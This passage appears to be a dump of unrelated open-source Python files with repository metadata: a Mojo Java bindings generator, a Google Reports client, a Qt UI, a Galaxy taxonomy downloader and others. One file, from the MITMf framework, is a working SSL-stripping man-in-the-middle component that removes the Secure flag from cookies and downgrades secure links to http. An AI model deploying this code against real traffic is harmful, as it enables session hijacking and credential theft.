return '%s(%s)' % (methodName, ', '.join(params))
@contextfilter
def EncodeMethod(context, kind, variable, offset, bit):
params = AppendEncodeDecodeParams(
[ variable, str(offset) ], context, kind, bit)
return 'encode(%s)' % ', '.join(params)
def GetPackage(module):
if 'JavaPackage' in module.attributes:
return ParseStringAttribute(module.attributes['JavaPackage'])
# Default package.
return 'org.chromium.mojom.' + module.namespace
def GetNameForKind(context, kind):
def _GetNameHierachy(kind):
hierachy = []
if kind.parent_kind:
hierachy = _GetNameHierachy(kind.parent_kind)
hierachy.append(GetNameForElement(kind))
return hierachy
module = context.resolve('module')
elements = []
if GetPackage(module) != GetPackage(kind.module):
elements += [GetPackage(kind.module)]
elements += _GetNameHierachy(kind)
return '.'.join(elements)
def GetBoxedJavaType(context, kind):
unboxed_type = GetJavaType(context, kind, False)
if unboxed_type in _java_primitive_to_boxed_type:
return _java_primitive_to_boxed_type[unboxed_type]
return unboxed_type
@contextfilter
def GetJavaType(context, kind, boxed=False):
if boxed:
return GetBoxedJavaType(context, kind)
if mojom.IsStructKind(kind) or mojom.IsInterfaceKind(kind):
return GetNameForKind(context, kind)
if mojom.IsInterfaceRequestKind(kind):
return ('org.chromium.mojo.bindings.InterfaceRequest<%s>' %
GetNameForKind(context, kind.kind))
if mojom.IsAnyArrayKind(kind):
return '%s[]' % GetJavaType(context, kind.kind)
if mojom.IsEnumKind(kind):
return 'int'
return _spec_to_java_type[kind.spec]
@contextfilter
def DefaultValue(context, field):
assert field.default
if isinstance(field.kind, mojom.Struct):
assert field.default == 'default'
return 'new %s()' % GetJavaType(context, field.kind)
return '(%s) %s' % (
GetJavaType(context, field.kind),
ExpressionToText(context, field.default, kind_spec=field.kind.spec))
@contextfilter
def ConstantValue(context, constant):
return '(%s) %s' % (
GetJavaType(context, constant.kind),
ExpressionToText(context, constant.value, kind_spec=constant.kind.spec))
@contextfilter
def NewArray(context, kind, size):
if mojom.IsAnyArrayKind(kind.kind):
return NewArray(context, kind.kind, size) + '[]'
return 'new %s[%s]' % (GetJavaType(context, kind.kind), size)
@contextfilter
def ExpressionToText(context, token, kind_spec=''):
def _TranslateNamedValue(named_value):
entity_name = GetNameForElement(named_value)
if named_value.parent_kind:
return GetJavaType(context, named_value.parent_kind) + '.' + entity_name
# Handle the case where named_value is a module level constant:
if not isinstance(named_value, mojom.EnumValue):
entity_name = (GetConstantsMainEntityName(named_value.module) + '.' +
entity_name)
if GetPackage(named_value.module) == GetPackage(context.resolve('module')):
return entity_name
return GetPackage(named_value.module) + '.' + entity_name
if isinstance(token, mojom.NamedValue):
return _TranslateNamedValue(token)
if kind_spec.startswith('i') or kind_spec.startswith('u'):
# Add Long suffix to all integer literals.
number = ast.literal_eval(token.lstrip('+ '))
if not isinstance(number, (int, long)):
raise ValueError('got unexpected type %r for int literal %r' % (
type(number), token))
# If the literal is too large to fit a signed long, convert it to the
# equivalent signed long.
if number >= 2 ** 63:
number -= 2 ** 64
return '%dL' % number
if isinstance(token, mojom.BuiltinValue):
if token.value == 'double.INFINITY':
return 'java.lang.Double.POSITIVE_INFINITY'
if token.value == 'double.NEGATIVE_INFINITY':
return 'java.lang.Double.NEGATIVE_INFINITY'
if token.value == 'double.NAN':
return 'java.lang.Double.NaN'
if token.value == 'float.INFINITY':
return 'java.lang.Float.POSITIVE_INFINITY'
if token.value == 'float.NEGATIVE_INFINITY':
return 'java.lang.Float.NEGATIVE_INFINITY'
if token.value == 'float.NAN':
return 'java.lang.Float.NaN'
return token
def IsPointerArrayKind(kind):
if not mojom.IsAnyArrayKind(kind):
return False
sub_kind = kind.kind
return mojom.IsObjectKind(sub_kind)
def GetResponseStructFromMethod(method):
return generator.GetDataHeader(
False, generator.GetResponseStructFromMethod(method))
def GetStructFromMethod(method):
return generator.GetDataHeader(
False, generator.GetStructFromMethod(method))
def GetConstantsMainEntityName(module):
if 'JavaConstantsClassName' in module.attributes:
return ParseStringAttribute(module.attributes['JavaConstantsClassName'])
# This constructs the name of the embedding classes for module level constants
# by extracting the mojom's filename and prepending it to Constants.
return (UpperCamelCase(module.path.split('/')[-1].rsplit('.', 1)[0]) +
'Constants')
def GetMethodOrdinalName(method):
return ConstantStyle(method.name) + '_ORDINAL'
def HasMethodWithResponse(interface):
for method in interface.methods:
if method.response_parameters:
return True
return False
def HasMethodWithoutResponse(interface):
for method in interface.methods:
if not method.response_parameters:
return True
return False
@contextlib.contextmanager
def TempDir():
dirname = tempfile.mkdtemp()
try:
yield dirname
finally:
shutil.rmtree(dirname)
def ZipContentInto(root, zip_filename):
with zipfile.ZipFile(zip_filename, 'w') as zip_file:
for dirname, _, files in os.walk(root):
for filename in files:
path = os.path.join(dirname, filename)
path_in_archive = os.path.relpath(path, root)
zip_file.write(path, path_in_archive)
class Generator(generator.Generator):
java_filters = {
'interface_response_name': GetInterfaceResponseName,
'constant_value': ConstantValue,
'default_value': DefaultValue,
'decode_method': DecodeMethod,
'expression_to_text': ExpressionToText,
'encode_method': EncodeMethod,
'has_method_with_response': HasMethodWithResponse,
'has_method_without_response': HasMethodWithoutResponse,
'is_fixed_array_kind': mojom.IsFixedArrayKind,
'is_handle': mojom.IsNonInterfaceHandleKind,
'is_nullable_kind': mojom.IsNullableKind,
'is_pointer_array_kind': IsPointerArrayKind,
'is_struct_kind': mojom.IsStructKind,
'java_type': GetJavaType,
'java_true_false': GetJavaTrueFalse,
'method_ordinal_name': GetMethodOrdinalName,
'name': GetNameForElement,
'new_array': NewArray,
'response_struct_from_method': GetResponseStructFromMethod,
'struct_from_method': GetStructFromMethod,
'struct_size': lambda ps: ps.GetTotalSize() + _HEADER_SIZE,
}
def GetJinjaExports(self):
return {
'package': GetPackage(self.module),
}
def GetJinjaExportsForInterface(self, interface):
exports = self.GetJinjaExports()
exports.update({'interface': interface})
if interface.client:
for client in self.module.interfaces:
if client.name == interface.client:
exports.update({'client': client})
return exports
@UseJinja('java_templates/enum.java.tmpl', filters=java_filters)
def GenerateEnumSource(self, enum):
exports = self.GetJinjaExports()
exports.update({'enum': enum})
return exports
@UseJinja('java_templates/struct.java.tmpl', filters=java_filters)
def GenerateStructSource(self, struct):
exports = self.GetJinjaExports()
exports.update({'struct': struct})
return exports
@UseJinja('java_templates/interface.java.tmpl', filters=java_filters)
def GenerateInterfaceSource(self, interface):
return self.GetJinjaExportsForInterface(interface)
@UseJinja('java_templates/interface_internal.java.tmpl', filters=java_filters)
def GenerateInterfaceInternalSource(self, interface):
return self.GetJinjaExportsForInterface(interface)
@UseJinja('java_templates/constants.java.tmpl', filters=java_filters)
def GenerateConstantsSource(self, module):
exports = self.GetJinjaExports()
exports.update({'main_entity': GetConstantsMainEntityName(module),
'constants': module.constants})
return exports
def DoGenerateFiles(self):
if not os.path.exists(self.output_dir):
try:
os.makedirs(self.output_dir)
except:
# Ignore errors on directory creation.
pass
# Keep this above the others as .GetStructs() changes the state of the
# module, annotating structs with required information.
for struct in self.GetStructs():
self.Write(self.GenerateStructSource(struct),
'%s.java' % GetNameForElement(struct))
for enum in self.module.enums:
self.Write(self.GenerateEnumSource(enum),
'%s.java' % GetNameForElement(enum))
for interface in self.module.interfaces:
self.Write(self.GenerateInterfaceSource(interface),
'%s.java' % GetNameForElement(interface))
self.Write(self.GenerateInterfaceInternalSource(interface),
'%s_Internal.java' % GetNameForElement(interface))
if self.module.constants:
self.Write(self.GenerateConstantsSource(self.module),
'%s.java' % GetConstantsMainEntityName(self.module))
def GenerateFiles(self, unparsed_args):
parser = argparse.ArgumentParser()
parser.add_argument('--java_output_directory', dest='java_output_directory')
args = parser.parse_args(unparsed_args)
package_path = GetPackage(self.module).replace('.', '/')
# Generate the java files in a temporary directory and place a single
# srcjar in the output directory.
zip_filename = os.path.join(self.output_dir,
"%s.srcjar" % self.module.name)
with TempDir() as temp_java_root:
self.output_dir = os.path.join(temp_java_root, package_path)
self.DoGenerateFiles();
ZipContentInto(temp_java_root, zip_filename)
if args.java_output_directory:
# If requested, generate the java files directly into indicated directory.
self.output_dir = os.path.join(args.java_output_directory, package_path)
self.DoGenerateFiles();
def GetJinjaParameters(self):
return {
'lstrip_blocks': True,
'trim_blocks': True,
}
def GetGlobals(self):
return {
'namespace': self.module.namespace,
'module': self.module,
}
| bsd-3-clause | 5,533,580,926,936,481,000 | 34.819277 | 80 | 0.693127 | false |
czervenka/gapi | gapi/api/reports.py | 1 | 2192 | # Copyright 2013 Lukas Marek <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from datetime import date, datetime, timedelta
from ..gapi_utils import api_fetch
from ..client import ApiService, ApiResource, value_to_gdata
__author__ = 'Robin Gottfried <[email protected]>'
# https://www.googleapis.com/admin/reports/v1/activity/users/{userKey}/applications/{applicationName}
class Service(ApiService):
_base_url = 'https://www.googleapis.com/admin/reports/v1'
_default_scope = 'https://www.googleapis.com/auth/admin.reports.usage.readonly'
@property
def _resources(self):
return [Usage]
ApiService._services['reports'] = Service
class Usage(ApiResource):
_name = 'usage'
_methods = 'get', 'get_latest',
_base_path = '/usage/users/{user}/dates/{date}'
def _api_get(self, user, day, **kwargs):
if isinstance(day, (datetime, date)):
day = day.strftime('%Y-%m-%d')
url = self._base_url.format(user=user, date=day)
return self._service.fetch(url, method='GET', params=kwargs)
def _api_get_latest(self, user, max_age=8, **kwargs):
from ..exceptions import GoogleApiHttpException
day = date.today()
age = 1
result = None
while not result and age <= max_age:
try:
result = self._api_get(user, day-timedelta(age), **kwargs)
except GoogleApiHttpException, e:
# would be nice if Google had returned useful informations on
# data not available
if e.code == 400:
age *= 2
else:
raise
return result
| apache-2.0 | 955,231,716,949,358,300 | 32.212121 | 101 | 0.645529 | false |
sechacking/MITMf | core/ferretng/SSLServerConnection.py | 28 | 4133 | # Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging, re, string
from core.logger import logger
from ServerConnection import ServerConnection
from URLMonitor import URLMonitor
formatter = logging.Formatter("%(asctime)s [Ferret-NG] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("Ferret_SSLServerConnection", formatter)
class SSLServerConnection(ServerConnection):
'''
For SSL connections to a server, we need to do some additional stripping. First we need
to make note of any relative links, as the server will be expecting those to be requested
via SSL as well. We also want to slip our favicon in here and kill the secure bit on cookies.
'''
cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE)
cssExpression = re.compile(r"url\(([\w\d:#@%/;$~_?\+-=\\\.&]+)\)", re.IGNORECASE)
iconExpression = re.compile(r"<link rel=\"shortcut icon\" .*href=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
linkExpression = re.compile(r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
headExpression = re.compile(r"<head>", re.IGNORECASE)
def __init__(self, command, uri, postData, headers, client):
ServerConnection.__init__(self, command, uri, postData, headers, client)
self.urlMonitor = URLMonitor.getInstance()
def getLogLevel(self):
return logging.INFO
def getPostPrefix(self):
return "SECURE POST"
def handleHeader(self, key, value):
if (key.lower() == 'set-cookie'):
value = SSLServerConnection.cookieExpression.sub("\g<1>", value)
ServerConnection.handleHeader(self, key, value)
def stripFileFromPath(self, path):
(strippedPath, lastSlash, file) = path.rpartition('/')
return strippedPath
def buildAbsoluteLink(self, link):
absoluteLink = ""
if ((not link.startswith('http')) and (not link.startswith('/'))):
absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link
log.debug("[SSLServerConnection] Found path-relative link in secure transmission: " + link)
log.debug("[SSLServerConnection] New Absolute path-relative link: " + absoluteLink)
elif not link.startswith('http'):
absoluteLink = "http://"+self.headers['host']+link
log.debug("[SSLServerConnection] Found relative link in secure transmission: " + link)
log.debug("[SSLServerConnection] New Absolute link: " + absoluteLink)
if not absoluteLink == "":
absoluteLink = absoluteLink.replace('&', '&')
self.urlMonitor.addSecureLink(self.client.getClientIP(), absoluteLink);
def replaceCssLinks(self, data):
iterator = re.finditer(SSLServerConnection.cssExpression, data)
for match in iterator:
self.buildAbsoluteLink(match.group(1))
return data
def replaceSecureLinks(self, data):
data = ServerConnection.replaceSecureLinks(self, data)
data = self.replaceCssLinks(data)
iterator = re.finditer(SSLServerConnection.linkExpression, data)
for match in iterator:
self.buildAbsoluteLink(match.group(10))
return data
| gpl-3.0 | 8,449,833,640,115,345,000 | 41.608247 | 146 | 0.649891 | false |
mintuhouse/shotfactory | build/lib.linux-x86_64-2.6/shotfactory04/gui/linux/iceweasel.py | 2 | 1088 | # browsershots.org - Test your web design in different browsers
# Copyright (C) 2007 Johann C. Rocholl <[email protected]>
#
# Browsershots is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# Browsershots is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
GUI-specific interface functions for X11.
"""
__revision__ = "$Rev: 2248 $"
__date__ = "$Date: 2007-10-26 15:46:36 +0530 (Fri, 26 Oct 2007) $"
__author__ = "$Author: johann $"
from shotfactory04.gui.linux import firefox as base
class Gui(base.Gui):
"""
Special functions for GNU Iceweasel.
"""
pass
| gpl-3.0 | -2,403,643,058,900,670,500 | 31.969697 | 70 | 0.724265 | false |
galaxyproject/tools-iuc | data_managers/data_manager_fetch_ncbi_taxonomy/data_manager/data_manager.py | 9 | 4462 | import argparse
import datetime
import json
import os
import shutil
import tarfile
import zipfile
from urllib.request import Request, urlopen
def url_download(url, workdir):
file_path = os.path.join(workdir, 'download.dat')
if not os.path.exists(workdir):
os.makedirs(workdir)
src = None
dst = None
try:
req = Request(url)
src = urlopen(req)
with open(file_path, 'wb') as dst:
while True:
chunk = src.read(2**10)
if chunk:
dst.write(chunk)
else:
break
finally:
if src:
src.close()
if tarfile.is_tarfile(file_path):
fh = tarfile.open(file_path, 'r:*')
elif zipfile.is_zipfile(file_path):
fh = zipfile.ZipFile(file_path, 'r')
else:
return
fh.extractall(workdir)
os.remove(file_path)
def download_name_maps(url, workdir, partial):
if partial:
map_files = [
'pdb.accession2taxid.gz',
]
else:
map_files = [
'dead_nucl.accession2taxid.gz',
'dead_prot.accession2taxid.gz',
'dead_wgs.accession2taxid.gz',
'nucl_gb.accession2taxid.gz',
'nucl_wgs.accession2taxid.gz',
'pdb.accession2taxid.gz',
'prot.accession2taxid.gz',
'prot.accession2taxid.FULL.gz'
]
if not os.path.exists(workdir):
os.makedirs(workdir)
for map in map_files:
src = "{}{}".format(url, map)
dest = os.path.join(workdir, map)
print("Downloading taxonomy accession2taxid file from {} to {}".format(src, dest))
try:
req = Request(src)
src = urlopen(req)
with open(dest, 'wb') as dst:
while True:
chunk = src.read(2**10)
if chunk:
dst.write(chunk)
else:
break
finally:
if src:
src.close()
def move_files_to_final_dir(workdir, target_directory, copy=False):
for filename in os.listdir(workdir):
if copy:
shutil.copy(os.path.join(workdir, filename), target_directory)
else:
shutil.move(os.path.join(workdir, filename), target_directory)
def main(args):
workdir = os.path.abspath(os.path.join(os.getcwd(), 'taxonomy'))
url_download(args.url, workdir)
data_manager_entry = {}
data_manager_entry['value'] = args.name.lower()
data_manager_entry['name'] = args.name
data_manager_entry['path'] = '.'
data_manager_json = dict(data_tables=dict(ncbi_taxonomy=data_manager_entry))
with open(args.output) as fh:
params = json.load(fh)
if args.name_maps:
workdir_a2t = os.path.join(os.getcwd(), 'accession2taxid')
download_name_maps("ftp://ftp.ncbi.nlm.nih.gov/pub/taxonomy/accession2taxid/", workdir_a2t, args.partial)
target_directory_a2t = os.path.join(params['output_data'][0]['extra_files_path'], "accession2taxid")
os.makedirs(target_directory_a2t)
move_files_to_final_dir(workdir_a2t, target_directory_a2t)
# Also copy taxonomy data to accession2taxid dir
move_files_to_final_dir(workdir, target_directory_a2t, copy=True)
data_manager_json['data_tables']['ncbi_accession2taxid'] = data_manager_entry
target_directory_tax = os.path.join(params['output_data'][0]['extra_files_path'], "taxonomy")
os.makedirs(target_directory_tax)
move_files_to_final_dir(workdir, target_directory_tax)
with open(args.output, 'w') as fh:
json.dump(data_manager_json, fh, sort_keys=True)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Create data manager json.')
parser.add_argument('--out', dest='output', action='store', help='JSON filename')
parser.add_argument('--name', dest='name', action='store', default=str(datetime.date.today()), help='Data table entry unique ID')
parser.add_argument('--url', dest='url', action='store', default='ftp://ftp.ncbi.nih.gov/pub/taxonomy/taxdump.tar.gz', help='Download URL')
parser.add_argument('--name-maps', dest='name_maps', action='store_true', help='')
parser.add_argument('--partial', dest='partial', action='store_true', help='Only download a small subset of data (for testing)')
args = parser.parse_args()
main(args)
| mit | 5,852,440,613,730,094,000 | 32.298507 | 143 | 0.597042 | false |
django-ch/olympus-project | src/migrations/versions/8d62dbc19154_.py | 1 | 1096 | """empty message
Revision ID: 8d62dbc19154
Revises: 19e3c7b51037
Create Date: 2017-03-04 20:18:51.833788
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '8d62dbc19154'
down_revision = '19e3c7b51037'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('routes', sa.Column('race_id', sa.Integer(), nullable=True))
op.drop_constraint('routes_route_id_fkey', 'routes', type_='foreignkey')
op.create_foreign_key(None, 'routes', 'races', ['race_id'], ['id'])
op.drop_column('routes', 'route_id')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('routes', sa.Column('route_id', sa.INTEGER(), autoincrement=False, nullable=True))
op.drop_constraint(None, 'routes', type_='foreignkey')
op.create_foreign_key('routes_route_id_fkey', 'routes', 'routes', ['route_id'], ['id'])
op.drop_column('routes', 'race_id')
# ### end Alembic commands ###
| gpl-2.0 | 2,678,023,165,994,155,500 | 31.235294 | 100 | 0.666971 | false |
zbarge/zeex | zeex/core/ui/project/main_ui.py | 1 | 6501 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'C:/Users/Zeke/Google Drive/dev/python/zeex/zeex/core/ui/project/main.ui'
#
# Created: Mon Nov 13 22:57:18 2017
# by: pyside-uic 0.2.15 running on PySide 1.2.2
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore, QtGui
class Ui_ProjectWindow(object):
def setupUi(self, ProjectWindow):
ProjectWindow.setObjectName("ProjectWindow")
ProjectWindow.resize(644, 422)
self.centralwidget = QtGui.QWidget(ProjectWindow)
self.centralwidget.setObjectName("centralwidget")
self.horizontalLayout = QtGui.QHBoxLayout(self.centralwidget)
self.horizontalLayout.setObjectName("horizontalLayout")
self.treeView = FileSystemTreeView(self.centralwidget)
self.treeView.setObjectName("treeView")
self.horizontalLayout.addWidget(self.treeView)
ProjectWindow.setCentralWidget(self.centralwidget)
self.menubar = QtGui.QMenuBar(ProjectWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 644, 21))
self.menubar.setObjectName("menubar")
self.menuFile = QtGui.QMenu(self.menubar)
self.menuFile.setObjectName("menuFile")
self.menuSettings = QtGui.QMenu(self.menubar)
self.menuSettings.setObjectName("menuSettings")
self.menuRecent_Files = QtGui.QMenu(self.menubar)
self.menuRecent_Files.setObjectName("menuRecent_Files")
self.menuActions = QtGui.QMenu(self.menubar)
self.menuActions.setObjectName("menuActions")
ProjectWindow.setMenuBar(self.menubar)
self.statusbar = QtGui.QStatusBar(ProjectWindow)
self.statusbar.setObjectName("statusbar")
ProjectWindow.setStatusBar(self.statusbar)
self.toolBar = QtGui.QToolBar(ProjectWindow)
self.toolBar.setObjectName("toolBar")
ProjectWindow.addToolBar(QtCore.Qt.LeftToolBarArea, self.toolBar)
self.actionNew = QtGui.QAction(ProjectWindow)
self.actionNew.setObjectName("actionNew")
self.actionOpen = QtGui.QAction(ProjectWindow)
self.actionOpen.setObjectName("actionOpen")
self.actionSave = QtGui.QAction(ProjectWindow)
self.actionSave.setObjectName("actionSave")
self.actionRemove = QtGui.QAction(ProjectWindow)
self.actionRemove.setObjectName("actionRemove")
self.actionPreferences = QtGui.QAction(ProjectWindow)
self.actionPreferences.setObjectName("actionPreferences")
self.actionMergePurge = QtGui.QAction(ProjectWindow)
self.actionMergePurge.setObjectName("actionMergePurge")
self.actionRename = QtGui.QAction(ProjectWindow)
self.actionRename.setObjectName("actionRename")
self.actionZip = QtGui.QAction(ProjectWindow)
self.actionZip.setObjectName("actionZip")
self.actionViewCloud = QtGui.QAction(ProjectWindow)
self.actionViewCloud.setObjectName("actionViewCloud")
self.actionAddFolder = QtGui.QAction(ProjectWindow)
self.actionAddFolder.setObjectName("actionAddFolder")
self.actionUnzip = QtGui.QAction(ProjectWindow)
self.actionUnzip.setObjectName("actionUnzip")
self.menuFile.addAction(self.actionNew)
self.menuFile.addAction(self.actionOpen)
self.menuFile.addAction(self.actionSave)
self.menuFile.addAction(self.actionRemove)
self.menuSettings.addAction(self.actionPreferences)
self.menuActions.addAction(self.actionMergePurge)
self.menuActions.addAction(self.actionAddFolder)
self.menuActions.addAction(self.actionRename)
self.menuActions.addAction(self.actionViewCloud)
self.menuActions.addAction(self.actionUnzip)
self.menuActions.addAction(self.actionZip)
self.menubar.addAction(self.menuFile.menuAction())
self.menubar.addAction(self.menuRecent_Files.menuAction())
self.menubar.addAction(self.menuActions.menuAction())
self.menubar.addAction(self.menuSettings.menuAction())
self.toolBar.addSeparator()
self.retranslateUi(ProjectWindow)
QtCore.QMetaObject.connectSlotsByName(ProjectWindow)
def retranslateUi(self, ProjectWindow):
ProjectWindow.setWindowTitle(QtGui.QApplication.translate("ProjectWindow", "MyProject", None, QtGui.QApplication.UnicodeUTF8))
self.menuFile.setTitle(QtGui.QApplication.translate("ProjectWindow", "File", None, QtGui.QApplication.UnicodeUTF8))
self.menuSettings.setTitle(QtGui.QApplication.translate("ProjectWindow", "Settings", None, QtGui.QApplication.UnicodeUTF8))
self.menuRecent_Files.setTitle(QtGui.QApplication.translate("ProjectWindow", "Recent", None, QtGui.QApplication.UnicodeUTF8))
self.menuActions.setTitle(QtGui.QApplication.translate("ProjectWindow", "Actions", None, QtGui.QApplication.UnicodeUTF8))
self.toolBar.setWindowTitle(QtGui.QApplication.translate("ProjectWindow", "toolBar", None, QtGui.QApplication.UnicodeUTF8))
self.actionNew.setText(QtGui.QApplication.translate("ProjectWindow", "New", None, QtGui.QApplication.UnicodeUTF8))
self.actionOpen.setText(QtGui.QApplication.translate("ProjectWindow", "Open", None, QtGui.QApplication.UnicodeUTF8))
self.actionSave.setText(QtGui.QApplication.translate("ProjectWindow", "Save", None, QtGui.QApplication.UnicodeUTF8))
self.actionRemove.setText(QtGui.QApplication.translate("ProjectWindow", "Remove", None, QtGui.QApplication.UnicodeUTF8))
self.actionPreferences.setText(QtGui.QApplication.translate("ProjectWindow", "Preferences", None, QtGui.QApplication.UnicodeUTF8))
self.actionMergePurge.setText(QtGui.QApplication.translate("ProjectWindow", "Merge/Purge", None, QtGui.QApplication.UnicodeUTF8))
self.actionRename.setText(QtGui.QApplication.translate("ProjectWindow", "Rename", None, QtGui.QApplication.UnicodeUTF8))
self.actionZip.setText(QtGui.QApplication.translate("ProjectWindow", "Zip", None, QtGui.QApplication.UnicodeUTF8))
self.actionViewCloud.setText(QtGui.QApplication.translate("ProjectWindow", "View Cloud", None, QtGui.QApplication.UnicodeUTF8))
self.actionAddFolder.setText(QtGui.QApplication.translate("ProjectWindow", "Add Folder", None, QtGui.QApplication.UnicodeUTF8))
self.actionUnzip.setText(QtGui.QApplication.translate("ProjectWindow", "Unzip", None, QtGui.QApplication.UnicodeUTF8))
from core.views.basic.treeview import FileSystemTreeView
| mit | -8,549,020,228,185,598,000 | 62.116505 | 138 | 0.742809 | false |
MicrosoftGenomics/WarpedLMM | warpedlmm/util/transformations.py | 2 | 1592 | import numpy as np
_exp_lim_val = np.finfo(np.float64).max
_lim_val = 36.0
epsilon = np.finfo(np.float64).resolution
class Exponent(object):
def f(self, x):
return np.where(x<_lim_val, np.where(x>-_lim_val, np.exp(x), np.exp(-_lim_val)), np.exp(_lim_val))
def finv(self, x):
return np.log(x)
def gradfactor(self, f):
return f
def initialize(self, f):
return np.abs(f)
def __str__(self):
return '+ve'
class Linear(object):
def f(self, x):
return x
def finv(self, x):
return x
def gradfactor(self, f):
return 1.0
def initialize(self, f):
return f
def __str__(self):
return ''
class Logexp(object):
def f(self, x):
return np.where(x>_lim_val, x, np.log(1. + np.exp(np.clip(x, -_lim_val, _lim_val)))) + epsilon
#raises overflow warning: return np.where(x>_lim_val, x, np.log(1. + np.exp(x)))
def finv(self, f):
return np.where(f>_lim_val, f, np.log(np.exp(f+1e-20) - 1.))
def gradfactor(self, f):
return np.where(f>_lim_val, 1., 1. - np.exp(-f))
def initialize(self, f):
return np.abs(f)
def __str__(self):
return '+ve'
# class logexp(transformation):
# domain = POSITIVE
# def f(self, x):
# return np.log(1. + np.exp(x))
# def finv(self, f):
# return np.log(np.exp(f) - 1.)
# def gradfactor(self, f):
# ef = np.exp(f)
# return (ef - 1.) / ef
# def initialize(self, f):
# return np.abs(f)
# def __str__(self):
# return '(+ve)'
| apache-2.0 | -3,212,006,392,889,784,300 | 27.428571 | 106 | 0.535804 | false |
timrae/anki | oldanki/errors.py | 20 | 1139 | # -*- coding: utf-8 -*-
# Copyright: Damien Elmes <[email protected]>
# License: GNU GPL, version 3 or later; http://www.gnu.org/copyleft/gpl.html
"""\
Errors
==============================
"""
__docformat__ = 'restructuredtext'
class Error(Exception):
def __init__(self, message="", **data):
self.data = data
self._message = message
def __str__(self):
m = self._message
if self.data:
m += ": %s" % repr(self.data)
return m
class DeckAccessError(Error):
pass
class ImportFileError(Error):
"Unable to load file to import from."
pass
class ImportFormatError(Error):
"Unable to determine pattern in text file."
pass
class ImportEncodingError(Error):
"The file was not in utf-8."
pass
class ExportFileError(Error):
"Unable to save file."
pass
class SyncError(Error):
"A problem occurred during syncing."
pass
# facts, models
class FactInvalidError(Error):
"""A fact was invalid/not unique according to the model.
'field' defines the problem field.
'type' defines the type of error ('fieldEmpty', 'fieldNotUnique')"""
pass
| agpl-3.0 | 5,725,692,757,608,717,000 | 22.244898 | 76 | 0.628622 | false |
jankim/deepnl | deepnl/embeddings.py | 1 | 4634 | # -*- coding: utf-8 -*-
"""
Load word embeddings from different representations.
"""
import os
import numpy as np
import logging
from itertools import izip
# local
from word_dictionary import WordDictionary
# ----------------------------------------------------------------------
class Plain(object):
@classmethod
def read_vectors(cls, filename):
"""
Read an embedding from a plain text file with one vector per
line, values separated by whitespace.
"""
with open(filename, 'rb') as file:
matrix = np.array([[float(value) for value in line.split()]
for line in file])
return matrix
@classmethod
def read_vocabulary(cls, filename):
"""
Read a vocabulary file containing one word per line.
Return a list of words.
"""
words = []
with open(filename, 'rb') as f:
for line in f:
word = unicode(line.strip(), 'utf-8')
if word:
words.append(word)
return words
@classmethod
def write_vocabulary(cls, vocab, filename):
"""
Write a vocabulary to a file containing one word per line.
"""
with open(filename, 'wb') as f:
for word in vocab:
print >> f, word.encode('utf-8')
@classmethod
def write_vectors(cls, filename, matrix):
"""
Write embedding vectors to a plain text file with one vector per
line, values separated by whitespace.
"""
with open(filename, 'wb') as file:
for row in matrix:
print >> file, ' '.join(["%f" % x for x in row])
# ----------------------------------------------------------------------
class Senna(object):
@classmethod
def read_vocabulary(cls, filename):
"""
Read the vocabulary file used by SENNA.
It has one word per line, all lower case except for the special words
PADDING and UNKNOWN.
"""
return Plain.vocabulary(filename)
# ----------------------------------------------------------------------
class Word2Embeddings(object):
@classmethod
def read_vocabulary(cls, filename):
"""
Read the vocabulary used with word2embeddings.
It is the same as a plain text vocabulary, except the embeddings for
the rare/unknown word are the first two items (before any word in the file).
"""
return Plain.vocabulary(filename, 'polyglot')
@classmethod
def read_vectors(cls, filename):
"""
Load the feature matrix used by word2embeddings.
"""
import cPickle as pickle
with open(filename, 'rb') as f:
model = pickle.load(f)
return model.get_word_embeddings()
# ----------------------------------------------------------------------
class Word2Vec(object):
@classmethod
def load(cls, filename):
"""
Load words and vectors from a file in word2vec format.
"""
words = []
vectors = []
with open(filename, 'rb') as f:
len, size = f.readline().split()
for line in f:
items = line.split()
word = unicode(items[0], 'utf-8')
words.append(word)
vectors.append([float(x) for x in items[1:]])
# vectors for the special symbols, not present in words, will be
# created later
return np.array(vectors), words
@classmethod
def save(cls, filename, words, vectors):
"""
Save words and vectors to a file in word2vec format.
:param vectors: is a Numpy array
"""
with open(filename, 'wb') as f:
print >> f, len(words), vectors.shape[1]
for word, vector in izip(words, vectors):
